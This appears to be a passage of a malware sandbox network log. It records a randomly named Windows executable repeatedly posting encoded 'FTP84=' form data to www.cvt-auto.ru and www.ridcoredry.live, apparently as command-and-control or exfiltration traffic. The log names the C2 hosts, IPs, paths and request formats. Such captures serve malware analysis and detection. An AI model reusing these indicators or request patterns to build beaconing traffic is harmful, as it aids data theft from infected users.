                                                  Data Raw: 46 54 50 38 34 3d 61 55 42 47 61 6c 31 6d 58 41 76 51 37 32 47 42 39 6b 6a 65 55 6a 47 72 61 65 73 59 66 48 31 48 2f 6d 6a 31 66 79 64 48 38 33 58 61 47 71 58 61 59 47 79 5a 42 42 6b 72 76 6c 4f 44 4e 49 45 77 4b 33 65 4b 76 50 66 39 42 46 75 6c 30 6b 6c 41 4e 5a 68 57 51 44 6d 31 6e 39 68 41 44 54 6c 34 65 41 73 71 49 6e 64 54 6c 39 49 50 71 73 4b 76 6b 51 39 4c 64 47 59 68 44 72 56 53 4e 48 56 6d 63 79 65 34 5a 69 48 4f 38 32 49 57 4e 72 74 6e 47 39 59 6a 62 5a 59 47 35 51 6c 6e 55 66 4b 31 2b 68 48 38 67 78 52 72 70 59 4e 51 54 56 67 2f 47 43 2f 36 51 5a 37 6d 33 52 39 41 34 68 65 68 2b 66 4c 78 35 30 34 35 32 4a 34 4b 57 35 4c 55 63 77 3d 3d
                                                  Data Ascii: FTP84=aUBGal1mXAvQ72GB9kjeUjGraesYfH1H/mj1fydH83XaGqXaYGyZBBkrvlODNIEwK3eKvPf9BFul0klANZhWQDm1n9hADTl4eAsqIndTl9IPqsKvkQ9LdGYhDrVSNHVmcye4ZiHO82IWNrtnG9YjbZYG5QlnUfK1+hH8gxRrpYNQTVg/GC/6QZ7m3R9A4heh+fLx50452J4KW5LUcw==
                                                  Jul 1, 2024 19:26:26.293921947 CEST366INHTTP/1.1 301 Moved Permanently
                                                  Server: nginx-reuseport/1.21.1
                                                  Date: Mon, 01 Jul 2024 17:26:26 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 0
                                                  Connection: close
                                                  X-Powered-By: PHP/8.3.8
                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                  X-Redirect-By: WordPress
                                                  Location: https://www.cvt-auto.ru/1cpo/


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  31192.168.2.76448645.130.41.249806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:26:28.041009903 CEST733OUTPOST /1cpo/ HTTP/1.1
                                                  Host: www.cvt-auto.ru
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 238
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.cvt-auto.ru
                                                  Referer: http://www.cvt-auto.ru/1cpo/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Raw: 46 54 50 38 34 3d 61 55 42 47 61 6c 31 6d 58 41 76 51 70 43 36 42 77 6e 62 65 46 7a 47 6f 66 65 73 59 56 6e 31 44 2f 6d 76 31 66 7a 59 43 38 6c 7a 61 47 4c 6e 61 4a 33 79 5a 53 78 6b 72 68 46 4f 61 43 6f 45 72 4b 32 6a 2f 76 4e 4c 39 42 42 47 6c 30 6c 56 41 59 36 4a 52 4b 7a 6d 33 2b 4e 68 47 4e 7a 6c 34 65 41 73 71 49 6e 34 32 6c 39 51 50 71 63 36 76 69 79 5a 49 51 6d 59 75 54 4c 56 53 63 58 56 69 63 79 65 57 5a 67 7a 6b 38 79 34 57 4e 76 70 6e 46 70 45 67 43 70 59 41 6d 41 6b 79 53 76 44 78 37 43 6a 38 68 43 46 65 78 36 39 44 53 6a 39 64 63 67 7a 57 4f 49 44 64 7a 54 5a 32 76 48 44 55 38 65 50 70 30 57 4d 59 70 2b 64 67 62 72 71 51 4b 43 52 57 42 73 39 63 36 2f 61 51 36 69 6d 6b 79 41 41 42 5a 6f 41 3d
                                                  Data Ascii: FTP84=aUBGal1mXAvQpC6BwnbeFzGofesYVn1D/mv1fzYC8lzaGLnaJ3yZSxkrhFOaCoErK2j/vNL9BBGl0lVAY6JRKzm3+NhGNzl4eAsqIn42l9QPqc6viyZIQmYuTLVScXVicyeWZgzk8y4WNvpnFpEgCpYAmAkySvDx7Cj8hCFex69DSj9dcgzWOIDdzTZ2vHDU8ePp0WMYp+dgbrqQKCRWBs9c6/aQ6imkyAABZoA=
                                                  Jul 1, 2024 19:26:28.835242987 CEST366INHTTP/1.1 301 Moved Permanently
                                                  Server: nginx-reuseport/1.21.1
                                                  Date: Mon, 01 Jul 2024 17:26:28 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 0
                                                  Connection: close
                                                  X-Powered-By: PHP/8.3.8
                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                  X-Redirect-By: WordPress
                                                  Location: https://www.cvt-auto.ru/1cpo/


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  32192.168.2.76448745.130.41.249806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:26:30.574495077 CEST1746OUTPOST /1cpo/ HTTP/1.1
                                                  Host: www.cvt-auto.ru
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 1250
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.cvt-auto.ru
                                                  Referer: http://www.cvt-auto.ru/1cpo/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Raw: 46 54 50 38 34 3d 61 55 42 47 61 6c 31 6d 58 41 76 51 70 43 36 42 77 6e 62 65 46 7a 47 6f 66 65 73 59 56 6e 31 44 2f 6d 76 31 66 7a 59 43 38 6c 37 61 47 34 2f 61 62 6b 71 5a 52 78 6b 72 70 6c 4f 48 43 6f 46 7a 4b 32 37 37 76 4e 33 4c 42 44 2b 6c 6d 7a 4a 41 4a 72 4a 52 66 6a 6d 33 32 74 68 44 44 54 6c 74 65 41 38 75 49 6e 6f 32 6c 39 51 50 71 66 69 76 69 67 39 49 53 6d 59 68 44 72 55 41 4e 48 56 47 63 79 57 67 5a 67 6d 52 38 68 77 57 4e 50 35 6e 44 61 73 67 4b 70 59 43 6e 41 6c 78 53 76 66 2b 37 43 2b 48 68 42 59 7a 78 36 56 44 51 79 34 6b 48 52 66 6f 4d 34 54 70 7a 41 77 61 6c 52 76 72 34 63 66 55 7a 58 30 72 70 2b 56 30 41 49 69 35 4a 33 73 62 41 39 39 51 36 73 57 65 78 53 62 52 33 68 6f 79 45 38 68 34 56 6f 6b 34 49 4b 57 47 39 52 38 57 48 41 44 51 59 2f 74 6d 6e 39 46 6c 54 48 67 2f 73 77 46 4b 57 50 71 53 7a 4a 46 79 49 57 65 44 71 70 7a 6a 43 71 63 5a 46 62 78 6d 38 4b 32 48 75 68 62 6e 6a 6f 7a 4f 33 75 55 70 45 6f 30 46 4a 57 37 68 7a 73 66 61 6e 71 79 70 53 33 70 56 31 71 39 41 62 68 44 77 [TRUNCATED]
                                                  Data Ascii: FTP84=aUBGal1mXAvQpC6BwnbeFzGofesYVn1D/mv1fzYC8l7aG4/abkqZRxkrplOHCoFzK277vN3LBD+lmzJAJrJRfjm32thDDTlteA8uIno2l9QPqfivig9ISmYhDrUANHVGcyWgZgmR8hwWNP5nDasgKpYCnAlxSvf+7C+HhBYzx6VDQy4kHRfoM4TpzAwalRvr4cfUzX0rp+V0AIi5J3sbA99Q6sWexSbR3hoyE8h4Vok4IKWG9R8WHADQY/tmn9FlTHg/swFKWPqSzJFyIWeDqpzjCqcZFbxm8K2HuhbnjozO3uUpEo0FJW7hzsfanqypS3pV1q9AbhDwaTuul/rxYv3emNOz59ElVHTKV487QHY+IuBbX8jIHK3nUuOsYBl/rCCt5H7Dwq2zt0hACgg/dGqLzNRWHSp8tqLdOacNhxFQemobANwRgHnKNQVL4t4j3FjicCsKkaEuwepqg3l/iJqOWATR8BQPTj7/r+LbtvedRhszgbGb50vFdu58lyUrEb6dTCrrxmC4PWrwFJ18vUBrPWaVYaWnw6//e1TunsfudcKT2FSYMjI5/FRFbkO0b/RjG29yk31Yz2ufzMKPK2AGLFKHWrPdYHVSsF1OxzGs7SssdrRccyiBR72flPfipqF+aLLlijQQakIds6cyKDhqmL0XW0bpuE1ssADUcwiALYcBEHDP7u68unmZ5G1zmAyjErDGknsJDDIwr1jjaGp9xZBV3ySp5nPzvxbpg+Xyi4PYY/oI4MYe1ToTjpCedI+cWr9+VssMbK8zVLpJxk5+SIkON8X5WnifUUAx3AGUzi9q5YGDwOypAfTiLDk1pSOMtqEbofazH4VTxD+VT3q/VamHJNsK4/bqPsdlDq2LtwYaAnvUlf6DojMnijeKopD1nPPAoDYh+YacwcFcuRy3mgOnSsv8LN5lrNqcHfk/zgV0a7rtpNR2eNXGbsJIv82XRw+L9o/53xMFij+nWWxS1ys/Giriv1D4Fip4m+fuDM [TRUNCATED]
                                                  Jul 1, 2024 19:26:31.389900923 CEST366INHTTP/1.1 301 Moved Permanently
                                                  Server: nginx-reuseport/1.21.1
                                                  Date: Mon, 01 Jul 2024 17:26:31 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 0
                                                  Connection: close
                                                  X-Powered-By: PHP/8.3.8
                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                  X-Redirect-By: WordPress
                                                  Location: https://www.cvt-auto.ru/1cpo/


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  33192.168.2.76448845.130.41.249806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:26:33.240206957 CEST454OUTGET /1cpo/?FTP84=XWpmZSZkQQ3crjSg4jO9FnvqfvQgDjUUlmKrUzlk+2X+Pq/xYmmvIQcMng+aGKp/N3zIo6PNXS6jtUQwBpM9XRiN/OVETSVEN1Q9JXY1u8NKleTflw9Of0xlNOdKZA91JkeaJQbbmRkx&Lb=GFtlIrHx8T50 HTTP/1.1
                                                  Host: www.cvt-auto.ru
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Jul 1, 2024 19:26:34.063911915 CEST529INHTTP/1.1 301 Moved Permanently
                                                  Server: nginx-reuseport/1.21.1
                                                  Date: Mon, 01 Jul 2024 17:26:33 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 0
                                                  Connection: close
                                                  X-Powered-By: PHP/8.3.8
                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                  X-Redirect-By: WordPress
                                                  Location: https://www.cvt-auto.ru/1cpo/?FTP84=XWpmZSZkQQ3crjSg4jO9FnvqfvQgDjUUlmKrUzlk+2X+Pq/xYmmvIQcMng+aGKp/N3zIo6PNXS6jtUQwBpM9XRiN/OVETSVEN1Q9JXY1u8NKleTflw9Of0xlNOdKZA91JkeaJQbbmRkx&Lb=GFtlIrHx8T50


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  34192.168.2.76448991.195.240.123806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:26:39.195626974 CEST725OUTPOST /blq3/ HTTP/1.1
                                                  Host: www.ridcoredry.live
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 218
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.ridcoredry.live
                                                  Referer: http://www.ridcoredry.live/blq3/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Raw: 46 54 50 38 34 3d 79 53 6f 67 6c 42 53 73 6c 66 42 70 6c 53 2f 62 7a 77 57 4e 31 64 30 6c 38 41 38 36 67 62 2f 53 64 50 76 50 39 66 62 61 49 52 79 53 31 6e 31 5a 7a 53 42 32 79 70 7a 58 34 53 6f 73 35 44 64 55 36 62 68 58 6d 50 62 31 7a 4f 75 32 33 39 2b 57 4a 49 69 76 37 45 74 42 4d 72 79 34 30 62 79 58 51 39 41 4c 2b 76 45 50 71 58 2f 47 4e 56 5a 77 55 52 2f 73 56 62 2b 70 43 37 31 41 54 36 38 31 62 51 34 66 61 70 7a 35 36 36 64 33 79 48 59 6b 56 67 69 6e 79 53 56 41 4e 33 47 52 6b 4b 69 72 68 59 61 4f 34 4a 33 61 2f 44 42 31 51 37 67 67 38 78 75 4f 72 48 49 6e 6a 31 66 6b 30 74 67 79 6c 2f 6a 37 54 33 76 39 4a 6f 6d 75 61 34 48 72 73 41 3d 3d
                                                  Data Ascii: FTP84=ySoglBSslfBplS/bzwWN1d0l8A86gb/SdPvP9fbaIRyS1n1ZzSB2ypzX4Sos5DdU6bhXmPb1zOu239+WJIiv7EtBMry40byXQ9AL+vEPqX/GNVZwUR/sVb+pC71AT681bQ4fapz566d3yHYkVginySVAN3GRkKirhYaO4J3a/DB1Q7gg8xuOrHInj1fk0tgyl/j7T3v9Jomua4HrsA==
                                                  Jul 1, 2024 19:26:39.897694111 CEST305INHTTP/1.1 405 Not Allowed
                                                  date: Mon, 01 Jul 2024 17:26:39 GMT
                                                  content-type: text/html
                                                  content-length: 154
                                                  server: Parking/1.0
                                                  connection: close
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  35192.168.2.76449091.195.240.123806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:26:41.755805016 CEST745OUTPOST /blq3/ HTTP/1.1
                                                  Host: www.ridcoredry.live
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 238
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.ridcoredry.live
                                                  Referer: http://www.ridcoredry.live/blq3/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Raw: 46 54 50 38 34 3d 79 53 6f 67 6c 42 53 73 6c 66 42 70 6c 7a 50 62 79 53 2b 4e 30 39 30 69 35 41 38 36 35 72 2b 5a 64 50 6a 50 39 61 37 4b 49 44 57 53 30 47 46 5a 39 77 35 32 78 70 7a 58 73 69 6f 54 30 6a 64 66 36 62 73 69 6d 4b 7a 31 7a 4f 71 32 33 34 61 57 4a 62 36 6f 34 30 74 44 58 37 79 36 33 72 79 58 51 39 41 4c 2b 76 34 31 71 54 54 47 4e 6c 4a 77 62 55 66 76 57 62 2b 6d 4b 62 31 41 46 36 38 70 62 51 34 35 61 6f 75 75 36 38 5a 33 79 47 6f 6b 56 78 69 6b 37 53 55 46 51 48 48 76 73 59 72 2f 68 38 65 49 32 4a 75 4f 6e 6a 6c 6f 63 74 39 43 6d 54 69 69 31 57 77 63 6e 33 37 53 6a 4c 39 48 6e 2b 6e 6a 65 56 62 63 57 66 44 45 58 71 6d 76 36 78 6d 4e 32 35 72 49 54 2f 6e 43 79 6e 4c 74 77 4b 76 55 34 59 55 3d
                                                  Data Ascii: FTP84=ySoglBSslfBplzPbyS+N090i5A865r+ZdPjP9a7KIDWS0GFZ9w52xpzXsioT0jdf6bsimKz1zOq234aWJb6o40tDX7y63ryXQ9AL+v41qTTGNlJwbUfvWb+mKb1AF68pbQ45aouu68Z3yGokVxik7SUFQHHvsYr/h8eI2JuOnjloct9CmTii1Wwcn37SjL9Hn+njeVbcWfDEXqmv6xmN25rIT/nCynLtwKvU4YU=
                                                  Jul 1, 2024 19:26:42.421699047 CEST305INHTTP/1.1 405 Not Allowed
                                                  date: Mon, 01 Jul 2024 17:26:42 GMT
                                                  content-type: text/html
                                                  content-length: 154
                                                  server: Parking/1.0
                                                  connection: close
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  36192.168.2.76449191.195.240.123806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:26:44.289427996 CEST1758OUTPOST /blq3/ HTTP/1.1
                                                  Host: www.ridcoredry.live
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 1250
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.ridcoredry.live
                                                  Referer: http://www.ridcoredry.live/blq3/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Raw: 46 54 50 38 34 3d 79 53 6f 67 6c 42 53 73 6c 66 42 70 6c 7a 50 62 79 53 2b 4e 30 39 30 69 35 41 38 36 35 72 2b 5a 64 50 6a 50 39 61 37 4b 49 44 65 53 31 77 52 5a 39 58 56 32 2b 4a 7a 58 76 69 6f 53 30 6a 64 43 36 62 6b 75 6d 4b 2f 4c 7a 4d 69 32 32 62 69 57 59 36 36 6f 6a 6b 74 44 49 72 79 35 30 62 79 47 51 39 52 44 2b 76 49 31 71 54 54 47 4e 6a 31 77 66 42 2f 76 5a 37 2b 70 43 37 31 4d 54 36 38 4e 62 52 51 48 61 6f 71 2b 36 4d 35 33 38 47 34 6b 53 44 36 6b 6d 69 55 4c 54 48 48 6e 73 59 33 4a 68 39 33 33 32 4b 7a 56 6e 6b 52 6f 5a 49 49 72 38 69 4f 34 68 57 73 46 70 33 37 6f 6c 74 6c 32 76 4e 66 72 58 46 33 6d 64 59 58 36 5a 36 57 76 78 6b 50 76 75 2f 58 70 5a 39 53 51 79 44 33 68 6c 59 50 4c 37 6f 52 55 68 66 2f 6e 79 58 46 39 4d 44 76 64 51 68 64 78 5a 63 76 71 44 71 61 7a 5a 66 70 77 6e 6a 50 55 4e 66 66 43 6e 4f 39 2b 42 6b 4c 44 66 5a 6a 5a 49 63 78 50 70 61 6f 59 6b 4a 57 65 4a 49 59 68 61 59 63 7a 79 4d 32 32 33 6e 63 56 70 54 70 34 74 43 56 73 5a 42 50 75 45 4c 46 69 42 34 31 79 7a 51 4c 59 [TRUNCATED]
                                                  Data Ascii: FTP84=ySoglBSslfBplzPbyS+N090i5A865r+ZdPjP9a7KIDeS1wRZ9XV2+JzXvioS0jdC6bkumK/LzMi22biWY66ojktDIry50byGQ9RD+vI1qTTGNj1wfB/vZ7+pC71MT68NbRQHaoq+6M538G4kSD6kmiULTHHnsY3Jh9332KzVnkRoZIIr8iO4hWsFp37oltl2vNfrXF3mdYX6Z6WvxkPvu/XpZ9SQyD3hlYPL7oRUhf/nyXF9MDvdQhdxZcvqDqazZfpwnjPUNffCnO9+BkLDfZjZIcxPpaoYkJWeJIYhaYczyM223ncVpTp4tCVsZBPuELFiB41yzQLYhMWUTWiyAC6Scz/zstyBtiKkhxVsZAptQOXBcXzn95GKbK6ns2c6eNssXgP0xx6kOvTYmfrnlfsXREuZRILSa3+zr8RXiwZLYUcNgYPEn36aZYm11FqTn0oxTXE5sRrxWy21dz2AoU3gcP5MyUAqKeKETqtYpwku44nayNM/LnSLKAcaILOEr24hRkrPbG2kxbDSrugRc3M/Hc9g483uEg16eZZCBABgUbr68VHTNEJ4xgHCq7bNFY0/R6dOt08tAlHD5s1bBb2cg87M6R3ZaBsGk70NCPr8PbNEUOGPufuhuZt5ysFNbTm47yS81ibbzM+mXTASfafFfNvwIbD6JmQr5dzMIU8k7pwwFQI7BTdyxvrF0thYN+vLkzh63ldRa5QuCHjzU+Q0ghEZ7WtNblpHngbYZcMdqP5bNSlCT/vWF1RMaeCyenwFh1qoZT/KKAcr71MUwt9s0f25zRQjnECGXzPZhSgLjHtx1WnnnL1JuM4ARLNtaK1aXknE1PMSCG3ZbvrpK4vrOboC+01AtV3lzHy0oBC3upe7hmppYKqLaPygJ2mrtvbHJ1BDjgyC1xrn31wg45A+TWoxOKijCkzzGwoiObBypECKP12ZYztBmsG4QqWJ3njHrTxEuSSXBCzfprYcCkB0CxaDCVwLO958NJz9eGw2fE [TRUNCATED]


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  37192.168.2.76449291.195.240.123806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:26:46.825320959 CEST458OUTGET /blq3/?Lb=GFtlIrHx8T50&FTP84=/QAAm0GouadCsSjm0XCQ0NNd9BYFgPCeNdHOqYXBISGV1GFo4SB1zqqUvhYZ4jEo/5lijPf3qt+9x6u7W4DslmBYMZTBtvuPQphb+44RgWDcLgkceETeTezSGqdjX9slNk8GIp6396hv HTTP/1.1
                                                  Host: www.ridcoredry.live
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Jul 1, 2024 19:26:47.501921892 CEST1236INHTTP/1.1 200 OK
                                                  date: Mon, 01 Jul 2024 17:26:47 GMT
                                                  content-type: text/html; charset=UTF-8
                                                  transfer-encoding: chunked
                                                  vary: Accept-Encoding
                                                  expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                  cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                  pragma: no-cache
                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_eo9OeiVz3GCxtPE6HZiRFFsltj5hMmzizKgZ49sO3Vh1F2ySG9mtuAn3+h1qcljkLT+fbFjDqpdrGmMO190vYg==
                                                  last-modified: Mon, 01 Jul 2024 17:26:47 GMT
                                                  x-cache-miss-from: parking-89c5695ff-ppcpm
                                                  server: Parking/1.0
                                                  connection: close
                                                  Data Raw: 32 45 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 65 6f 39 4f 65 69 56 7a 33 47 43 78 74 50 45 36 48 5a 69 52 46 46 73 6c 74 6a 35 68 4d 6d 7a 69 7a 4b 67 5a 34 39 73 4f 33 56 68 31 46 32 79 53 47 39 6d 74 75 41 6e 33 2b 68 31 71 63 6c 6a 6b 4c 54 2b 66 62 46 6a 44 71 70 64 72 47 6d 4d 4f 31 39 30 76 59 67 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 72 69 64 63 6f 72 65 64 72 79 2e 6c 69 76 65 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 72 69 64 63 [TRUNCATED]
                                                  Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_eo9OeiVz3GCxtPE6HZiRFFsltj5hMmzizKgZ49sO3Vh1F2ySG9mtuAn3+h1qcljkLT+fbFjDqpdrGmMO190vYg==><head><meta charset="utf-8"><title>ridcoredry.live&nbsp;-&nbsp;ridcoredry Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="ridcoredry.live is your first and best source for all of the information
                                                  Jul 1, 2024 19:26:47.501945019 CEST1236INData Raw: 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e
                                                  Data Ascii: youre looking for. From general topics to more of what you would expect to find here, ridcoredry.live has it all. We hope you find what you are searchin576g for!"><link rel="icon" type="image/png" href="//img.se
                                                  Jul 1, 2024 19:26:47.501957893 CEST1236INData Raw: 74 72 6f 6c 73 5d 29 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 30 7d 69 6d 67 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 73 76 67 3a 6e 6f 74 28 3a 72 6f 6f 74 29 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e
                                                  Data Ascii: trols]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform
